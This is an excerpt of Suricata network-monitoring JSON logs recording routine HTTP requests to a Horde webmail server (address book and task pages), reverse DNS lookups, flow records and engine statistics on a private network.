{"timestamp":"2020-02-29T00:16:37.399118+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:16:38.401616+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:38.630480+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989}} {"timestamp":"2020-02-29T00:16:39.000242+0000","flow_id":402321488552,"event_type":"flow","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:38.244392+0000","end":"2020-02-29T00:11:38.352829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000319+0000","flow_id":1991905642280549,"event_type":"flow","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.390757+0000","end":"2020-02-29T00:11:39.498900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000701+0000","flow_id":787184495559925,"event_type":"flow","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.525557+0000","end":"2020-02-29T00:11:39.634046+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000814+0000","flow_id":2068545038709269,"event_type":"flow","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.193045+0000","end":"2020-02-29T00:11:39.301552+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:41.000604+0000","flow_id":1085409844794818,"event_type":"flow","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:40.136642+0000","end":"2020-02-29T00:11:40.244904+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.000228+0000","event_type":"stats","stats":{"uptime":14655,"capture":{"kernel_packets":136170,"kernel_drops":0},"decoder":{"pkts":136197,"bytes":93657469,"invalid":188,"ipv4":134677,"ipv6":9,"ethernet":136197,"raw":0,"null":0,"sll":0,"tcp":129290,"udp":5184,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10003,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2798,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2814,"synack":2805,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1837,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2371,"failed_udp":112},"tx":{"http":4702,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2451}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2421,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":1,"flows_timeout":3,"flows_timeout_inuse":0,"flows_removed":3,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":154227,"memcap":0}}} {"timestamp":"2020-02-29T00:16:43.001275+0000","flow_id":921415108703488,"event_type":"flow","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:42.767232+0000","end":"2020-02-29T00:11:42.875378+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.634753+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34858,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:16:44.041696+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:44.262516+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13646,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.177191+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28552,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:16:49.000487+0000","flow_id":223250995218985,"event_type":"flow","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:48.199209+0000","end":"2020-02-29T00:11:48.307119+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:49.880408+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64725,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:50.000174+0000","event_type":"stats","stats":{"uptime":14662,"capture":{"kernel_packets":136226,"kernel_drops":0},"decoder":{"pkts":136232,"bytes":93672396,"invalid":189,"ipv4":134712,"ipv6":9,"ethernet":136232,"raw":0,"null":0,"sll":0,"tcp":129318,"udp":5190,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2800,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2816,"synack":2807,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":144,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1838,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2374,"failed_udp":112},"tx":{"http":4703,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2454}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2423,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":41010,"memcap":0}}} {"timestamp":"2020-02-29T00:16:50.079654+0000","flow_id":607027817694435,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","length":20}} {"timestamp":"2020-02-29T00:16:50.089117+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16564,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:52.000170+0000","flow_id":413251773933581,"event_type":"flow","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7733,"start":"2020-02-29T00:15:44.862221+0000","end":"2020-02-29T00:15:50.145157+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:52.301543+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34860,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":27,"tx_id":0}} {"timestamp":"2020-02-29T00:16:53.000301+0000","flow_id":862814588722720,"event_type":"flow","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1210,"bytes_toclient":890,"start":"2020-02-29T00:15:13.613920+0000","end":"2020-02-29T00:15:52.465705+0000","age":39,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:53.000509+0000","flow_id":447486943095378,"event_type":"flow","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:52.846418+0000","end":"2020-02-29T00:11:52.954641+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:53.000898+0000","flow_id":2078036930179823,"event_type":"flow","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":34,"bytes_toserver":4469,"bytes_toclient":36316,"start":"2020-02-29T00:15:09.176879+0000","end":"2020-02-29T00:15:52.465550+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:56.000995+0000","flow_id":623112466345782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1143,"bytes_toclient":8792,"start":"2020-02-29T00:15:50.208694+0000","end":"2020-02-29T00:15:55.405377+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:57.000323+0000","event_type":"stats","stats":{"uptime":14669,"capture":{"kernel_packets":136283,"kernel_drops":0},"decoder":{"pkts":136286,"bytes":93702366,"invalid":191,"ipv4":134764,"ipv6":9,"ethernet":136286,"raw":0,"null":0,"sll":0,"tcp":129364,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2780,"new_pruned":15,"est_pruned":2425,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":3,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21490,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:16:59.002148+0000","flow_id":2200121362976242,"event_type":"flow","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:11:57.953842+0000","end":"2020-02-29T00:11:58.181226+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:04.000248+0000","event_type":"stats","stats":{"uptime":14676,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:17:09.000342+0000","flow_id":173927609846779,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fc16:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:16:38.117755+0000","end":"2020-02-29T00:16:38.117755+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:10.000893+0000","flow_id":544162378397647,"event_type":"flow","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1157,"bytes_toclient":9925,"start":"2020-02-29T00:16:03.964559+0000","end":"2020-02-29T00:16:09.219655+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:11.000250+0000","event_type":"stats","stats":{"uptime":14683,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 